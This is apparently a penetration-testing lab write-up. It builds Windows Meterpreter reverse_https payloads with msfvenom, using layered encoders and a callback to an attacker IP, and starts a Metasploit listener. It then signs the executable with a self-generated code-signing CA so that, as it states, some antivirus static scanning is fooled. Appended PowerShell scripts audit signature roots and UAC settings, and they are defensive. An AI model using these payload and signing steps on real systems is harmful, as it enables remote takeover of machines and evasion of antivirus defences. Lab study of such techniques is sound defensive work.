Generating a root certificate locally and signing a file

msfvenom -p windows/meterpreter/reverse_https -f exe -o 0x7c.exe LHOST=192.168.33.123 LPORT=443


root@kali:~/Lab/0x7c.com# msfvenom -p windows/meterpreter/reverse_https -f exe -o 0x7c.exe LHOST=192.168.33.123 LPORT=443
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 496 bytes
Saved as: 0x7c.exe


msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.33.123 LPORT=443 -f exe -o 0x7chttps.exe
root@kali:~/Lab/0x7c.com# msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai -i 5  LHOST=192.168.0.123 LPORT=443 -a x86 --platform win -f raw | msfvenom -e x86/alpha_upper -i 3 -a x86 --platform win -f exe -o 0x7cmix.exe

root@kali:~/Lab/0x7c.com# msfconsole
msf > use exploit/multi/
Display all 217 possibilities? (y or n)
msf > use exploit/multi/handler
msf exploit(handler) > set Payload windows/meterpreter/reverse_https
Payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.33.123
LHOST => 192.168.33.123
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler...

Signing the file.
Sometimes simply attaching a signature to a program is enough to get past static scanning, even though the signature is unverified and invalid.

Tool: https://github.com/stufus/certerator

All certificates are signed with OpenSSL, but the generation process is fairly tedious, so this tool exists to produce all certificate-related files in one step.
If ca.pem does not exist, a CA certificate is generated from the configuration.
The CA PEM certificate is stored in ca.pem, the CA DER certificate in ca.cer, and the private key in ca.key. These files are then packaged into a PKCS12 file, ca.p12, with the password mwr. If ca.pem is supplied, it is used for signing instead.
If cert.pem does not exist, one is generated from the configuration parameters: the PEM certificate is saved as cert.pem and the private key as cert.key, and likewise all of these files are packaged into cert.p12. If cert.pem is supplied, this step is skipped.
Finally, OSSLSigncode or SignTool.exe is used to sign the program.

The configuration for the certificates to be generated is at the top of the script:

def certerator_config():
    ca = {}
    cert = {}

    ca['commonName'] = "0x7c Test Lab Root Authority"
    ca['stateOrProvinceName'] = "Hampshire"
    ca['localityName'] = "Basingstoke"
    ca['organizationName'] = "0x7c Lab"
    ca['organizationalUnitName'] = "Certification Authority"
    ca['emailAddress'] = "labs@0x7c.com"
    ca['countryName'] = "GB"
    ca['cert_filename'] = "ca.pem"
    ca['cert_der'] = "ca.cer"
    ca['cert_p12'] = "ca.p12"
    ca['cert_key'] = "ca.key"
    ca['serial'] = 123456
    ca['validfrom'] = "20100101000000Z"
    ca['validto'] = "20200101000000Z"
    ca['keyfilesize'] = 4096
    ca['hashalgorithm'] = "sha256"

    cert['commonName'] = "360 Test Lab Code Signing Verifier"
    cert['stateOrProvinceName'] = "Hampshire"
    cert['localityName'] = "Basingstoke"
    cert['organizationName'] = "0x7c.com"
    cert['organizationalUnitName'] = "Code Management"
    cert['emailAddress'] = "labs@0x7c.com"
    cert['countryName'] = "GB"
    cert['cert_filename'] = "cert.pem"
    cert['cert_key'] = "cert.key"
    cert['cert_csr'] = "cert.csr"
    cert['cert_p12'] = "cert.p12"
    cert['serial'] = 234567
    cert['validfrom'] = "20150101000000Z"
    cert['validto'] = "20180101000000Z"
    cert['keyfilesize'] = 4096
    cert['hashalgorithm'] = "sha256"

    return ca, cert
root@kali:~/Lab/0x7c.com/certerator-master# ls
certerator.py  ev  LICENCE.md  README.md  reg2cmd.py
root@kali:~/Lab/0x7c.com/certerator-master# python certerator.py

       .mMMMMMm.             MMm    M   WW   W   WW   RRRRR
      mMMMMMMMMMMM.           MM   MM    W   W   W    R   R
     /MMMM-    -MM.           MM   MM    W   W   W    R   R
    /MMM.    _  \/  ^         M M M M     W W W W     RRRR
    |M.    aRRr    /W|        M M M M     W W W W     R  R
    \/  .. ^^^   wWWW|        M  M  M      W   W      R   R
       /WW\.  .wWWWW/         M  M  M      W   W      R    R
       |WWWWWWWWWWW/
         .WWWWWW.      Certerator (Code Signing Certificate Generator)
                        stuart.morgan@mwrinfosecurity.com | @ukstufus

Generating new CA.....done
 Written PEM CA certificate to ca.pem
 Written DER CA certificate to ca.cer
 Written CA private key to ca.key
 Written CA PKCS12 (private key and certificate) to ca.p12
 SHA1 CA Fingerprint: 86:07:EA:51:5C:53:0A:7B:19:A0:2B:3D:E4:F1:52:DF:C1:AC:5E:EE
Generating new signing certificate.....done
 Written CSR certificate request to cert.csr
 Written PEM certificate to cert.pem
 Written private key to cert.key
 Written PKCS12 (private key and certificate) to cert.p12
 SHA1 Cert Fingerprint: 36:76:FB:CC:E7:B6:13:A5:F9:A0:BD:FB:05:75:48:E6:8A:91:D2:BF

Linux/UNIX:

osslsigncode -pkcs12 cert.p12 -pass mwr -in in.exe -out out.exe

Windows:

signtool.exe sign /f cert.p12 /p mwr in.exe
root@kali:~/Lab/0x7c.com/certerator-master# ls
ca.cer  ca.key  ca.p12  ca.pem  cert.csr  certerator.py  cert.key  cert.p12  cert.pem  ev  LICENCE.md  README.md  reg2cmd.py
root@kali:~/Lab/0x7c.com/certerator-master#

root@kali:~/Lab/0x7c.com/osslsigncode-1.7.1# ls
aclocal.m4  ChangeLog  compile  config.h.in  configure  configure.ac  COPYING  depcomp  install-sh  Makefile.am  Makefile.in  missing  osslsigncode.c  README  TODO
root@kali:~/Lab/0x7c.com/osslsigncode-1.7.1# ./configure
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /bin/mkdir -p
checking for gawk... no
checking for mawk... mawk
checking whether make sets $(MAKE)... yes
checking whether make supports nested variables... yes
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking whether gcc understands -c and -o together... yes
checking for style of include used by make... GNU
checking dependency style of gcc... gcc3
checking how to run the C preprocessor... gcc -E
checking for grep that handles long lines and -e... /bin/grep
checking for egrep... /bin/grep -E
checking for ANSI C header files... yes
checking for sys/types.h... yes
checking for sys/stat.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for memory.h... yes
checking for strings.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for unistd.h... yes
checking minix/config.h usability... no
checking minix/config.h presence... no
checking for minix/config.h... no
checking whether it is safe to define __EXTENSIONS__... yes
checking for pkg-config... no
checking how to run the C preprocessor... gcc -E
checking whether ln -s works... yes
checking for a sed that does not truncate output... /bin/sed
checking whether make sets $(MAKE)... (cached) yes
checking for an ANSI C-conforming const... yes
checking for ANSI C header files... (cached) yes
checking whether time.h and sys/time.h may both be included... yes
checking sys/mman.h usability... yes
checking sys/mman.h presence... yes
checking for sys/mman.h... yes
checking for mmap... yes
checking windows.h usability... no
checking windows.h presence... no
checking for windows.h... no
checking for dlopen in -ldl... yes
checking termios.h usability... yes
checking termios.h presence... yes
checking for termios.h... yes
checking for getpass... yes
checking for GSF... no
checking for OPENSSL... no
checking for OPENSSL... no
checking for RSA_verify in -lcrypto... no
configure: error: OpenSSL 0.9.8 or later is required. http://www.openssl.org/

Fix:

root@kali:~/Lab/0x7c.com/osslsigncode-1.7.1# apt-get install libssl-dev

Another error:

checking for getpass... yes
checking for GSF... no
checking for OPENSSL... no
checking for OPENSSL... no
checking for RSA_verify in -lcrypto... yes
checking for LIBCURL... no
checking for curl_easy_strerror in -lcurl... no
configure: error: Curl 7.12.0 or later is required for timestamping support. http://curl.haxx.se/

Fix again:

root@kali:~/Lab/0x7c.com/osslsigncode-1.7.1# apt-get install libcurl4-openssl-dev

Finally, compile and run:

root@kali:~/Lab/0x7c.com/osslsigncode-1.7.1# ./osslsigncode -certs cert.pem -key cert.key -in 0x7c.exe -out 0x7c-sign.exe
Succeeded

Windows:

d:\sign>"C:\Program Files (x86)\Windows Kits\10\bin\x86\signtool.exe" sign /f cert.p12 /p mwr 0x7c.exe
Done Adding Additional Store
Successfully signed: 0x7c.exe

The file is now signed, but because the CA is our own and is not recognized, the signature is invalid. If the CA is imported into the machine, however, the signature shows as valid, and that can fool some antivirus products.
References:
http://www.i0day.com/1173.html
https://labs.mwrinfosecurity.com/blog/masquerading-as-a-windows-system-binary-using-digital-signatures/
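The defender-side counterpart to the trick described above, as an added example that is not part of the original post or of certerator: it reads the Authenticode signature of a PE, walks the chain to its root, and reports whether that root comes from the Microsoft root program (the AuthRoot store) or was imported locally. It assumes Windows PowerShell 5.1 with the certificate provider available.

```powershell
# Added example, not from the original post or from certerator: audit the Authenticode
# signature on a PE and report whether its chain ends in a root shipped by the Microsoft
# root program or in a root that was imported locally (the case the post describes).
param([Parameter(Mandatory = $true)][string]$Path)

$sig = Get-AuthenticodeSignature -FilePath $Path
Write-Output "File:   $Path"
Write-Output "Status: $($sig.Status) - $($sig.StatusMessage)"

if ($null -eq $sig.SignerCertificate) {
    Write-Output "Result: no Authenticode signature present."
    return
}

# Build the chain ourselves so the root is visible even when trust fails.
$chain = New-Object System.Security.Cryptography.X509Certificates.X509Chain
$chain.ChainPolicy.RevocationMode = 'NoCheck'
$null = $chain.Build($sig.SignerCertificate)
$root = $chain.ChainElements[$chain.ChainElements.Count - 1].Certificate

Write-Output "Signer: $($sig.SignerCertificate.Subject)"
Write-Output "Root:   $($root.Subject)"
Write-Output "Root thumbprint: $($root.Thumbprint)"

# Heuristic: AuthRoot holds roots distributed by the Microsoft root program; a CA
# imported by hand (certutil, MMC, an installer) lands only in Root or CurrentUser\Root.
$inAuthRoot  = Get-ChildItem -Path Cert:\LocalMachine\AuthRoot |
               Where-Object { $_.Thumbprint -eq $root.Thumbprint }
$inLocalRoot = Get-ChildItem -Path Cert:\LocalMachine\Root, Cert:\CurrentUser\Root |
               Where-Object { $_.Thumbprint -eq $root.Thumbprint }

if ($sig.Status -ne 'Valid') {
    Write-Output "Result: signature does not chain to a trusted root; treat the file as unsigned."
} elseif (-not $inAuthRoot -and $inLocalRoot -and $root.Subject -notmatch 'Microsoft') {
    Write-Output "Result: trusted only via a locally installed root; check who imported it and when."
} else {
    Write-Output "Result: chain ends in a program-distributed (or Microsoft) root."
}
```

A locally imported root can carry any subject name, so compare the printed thumbprint against a known-good list rather than relying on the subject string alone.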

Enabling UAC

1. For the Administrator account, UAC is disabled.

The account itself is disabled by default; the command to enable it is:

net user administrator /active:yes


In the registry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

  • FilterAdministratorToken defaults to 0, meaning UAC is off for the administrator account. If set to 1, even the administrator user gets a UAC prompt whenever administrator rights are needed.
  • PromptOnSecureDesktop defaults to 1, meaning the UAC dialog is shown on a new, secure desktop. If set to 0, the UAC dialog is shown on the current interactive desktop.
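An audit of the two registry values above together with the state of the built-in Administrator account, as an added example that is not part of the original post. It assumes Windows PowerShell 5.1 (for Get-LocalUser) and treats an absent value as the Windows default the post states.

```powershell
# Added example, not from the original post: audit the UAC registry values described
# above together with the state of the built-in Administrator account (RID 500).
$key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$p = Get-ItemProperty -Path $key

# An absent value means the Windows default applies:
# FilterAdministratorToken = 0, PromptOnSecureDesktop = 1
$filterAdmin = if ($null -ne $p.FilterAdministratorToken) { [int]$p.FilterAdministratorToken } else { 0 }
$secureDesk  = if ($null -ne $p.PromptOnSecureDesktop)   { [int]$p.PromptOnSecureDesktop }   else { 1 }

# Identify the built-in Administrator by its SID suffix, not by its (renamable) name.
$builtinAdmin = Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-500' }

Write-Output "FilterAdministratorToken : $filterAdmin"
Write-Output "PromptOnSecureDesktop    : $secureDesk"
Write-Output "Built-in Administrator   : $($builtinAdmin.Name) (Enabled=$($builtinAdmin.Enabled))"

$findings = @()
if ($builtinAdmin.Enabled -and $filterAdmin -eq 0) {
    $findings += 'Built-in Administrator is enabled and exempt from UAC: everything it starts runs fully elevated.'
}
if ($secureDesk -eq 0) {
    $findings += 'UAC prompts appear on the interactive desktop, where other user-mode processes can interact with them.'
}
if ($findings.Count -eq 0) {
    Write-Output 'No UAC weaknesses found for these settings.'
} else {
    $findings | ForEach-Object { Write-Output "FINDING: $_" }
}
```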